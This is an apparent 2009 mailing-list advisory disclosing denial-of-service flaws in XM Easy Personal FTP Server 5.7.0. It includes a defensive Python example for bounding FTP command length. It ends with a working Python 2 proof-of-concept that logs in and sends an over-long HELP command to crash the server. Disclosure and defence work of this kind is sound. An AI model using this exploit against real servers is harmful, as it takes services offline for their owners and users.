Date: Fri, 5 Jun 2009 03:16:50 -0600
From: [email protected]
To: [email protected]
Subject: [Security] XM Easy Personal FTP Server Multiple DoS vulnerabilities
X-Virus-Scanned: antivirus-gw at tyumen.ru
XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial-of-service vulnerabilities exist in XM Easy Personal FTP Server that cause the application to crash when an overly long argument is sent to certain FTP commands after authentication.
Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as a parameter to one of these commands, the FTP server cannot process it and crashes. Note that this is a post-authentication vulnerability, so the user must be logged in to exploit it. No registers are overwritten, hence remote code execution may not be possible.
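As an added example (not the vendor's code and not part of the advisory), this is the check an FTP server's command reader should apply before dispatching HELP, TYPE or any other verb: bound the control-channel line, reject over-long input with a 500 reply, and keep it away from the handlers entirely. The same length check doubles as a log-review detector for oversized commands. MAX_LINE and the handler table are assumptions; the 5000-byte line used in the test mirrors the advisory's PoC buffer.

```python
# Added example, not the vendor's code: a bounded FTP control-line parser.
MAX_LINE = 512  # assumed limit; real FTP commands are far shorter than this

def parse_command(raw):
    """Split one control-channel line into (verb, argument).
    Returns (None, reply) carrying a 500-series reply when the line is
    too long or malformed, so the dispatcher never sees oversized input."""
    if len(raw) > MAX_LINE:
        return None, "500 Line too long"
    line = raw.rstrip("\r\n")
    if not line:
        return None, "500 Empty command"
    parts = line.split(" ", 1)
    verb = parts[0].upper()
    if not verb.isalpha() or len(verb) > 4:
        return None, "500 Syntax error, command unrecognized"
    arg = parts[1] if len(parts) > 1 else ""
    return verb, arg

def handle(raw, handlers, authenticated):
    """Validate, then dispatch. Length is checked before the login state
    so an unauthenticated or authenticated peer gets the same bounded path."""
    verb, arg = parse_command(raw)
    if verb is None:
        return arg  # arg holds the rejection reply
    if not authenticated and verb not in ("USER", "PASS", "QUIT"):
        return "530 Please login with USER and PASS"
    fn = handlers.get(verb)
    if fn is None:
        return "502 Command not implemented"
    return fn(arg)

# Constructed handler table for the two verbs named in the advisory.
HANDLERS = {
    "HELP": lambda arg: "214 Help OK",
    "TYPE": lambda arg: "200 Type set" if arg in ("A", "I")
            else "504 Command not implemented for that parameter",
}

def oversized_commands(session_lines, limit=MAX_LINE):
    """Detection helper for captured control-channel logs: return
    (verb, length) for every line whose argument exceeds the limit."""
    hits = []
    for line in session_lines:
        verb = line.split(" ", 1)[0].upper()
        if len(line) > limit:
            hits.append((verb, len(line)))
    return hits
```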
Severity:
High
Solution:
No patches available from vendor
No workaround is available at this time
Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure
PoC: Python Exploit
-----------------------------------------------------
#!/usr/bin/env python2
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
#              A Denial of service vulnerability exists in XM
#              Personal FTP Server that causes the application to
#              crash when a long list of arguments is sent to
#              certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............
import sys
from ftplib import FTP

def usage():
    print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
    print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
    print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
    print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"

# The Main function starts here..
if __name__ == "__main__":
    ftpport = 21
    # get the args.. (server, username and password are all required)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    print "Connecting to "+ftpserver+" using "+user+"....",
    # Try opening a connection to the FTP server (3 second socket timeout)
    try:
        F = FTP()
        F.connect(ftpserver, ftpport, 3)
        print 'Connected !'
    except Exception:
        print "\nCould not connect to the Server :(\n"
        sys.exit(1)
    #Lets create the Buffer..
    crap = "A" * 5000
    # Creat'in da'bomb
    dabomb = 'HELP '+crap
    print "Press any key to login.."
    ch = sys.stdin.read(1)
    # Lets login (the bug is only reachable after authentication)
    try:
        F.login(user, passwd)
    except Exception:
        print "Oops.. Looks like you forgot to create a login !!\n"
        F.quit()
        sys.exit(1)
    print "Target Locked, Press any key to fire..",
    ch = sys.stdin.read(1)
    print 'Sendin Da\'Bomb..'
    # A dropped connection or timeout here means the server went down
    try:
        F.sendcmd(dabomb)
    except Exception:
        print 'Target destroyed !! Mission successfull..!'
    else:
        print 'Server answered normally, it does not look vulnerable..'
    print 'Returning to base..'
    F.close()
    sys.exit(0)
-----------------------------------------------------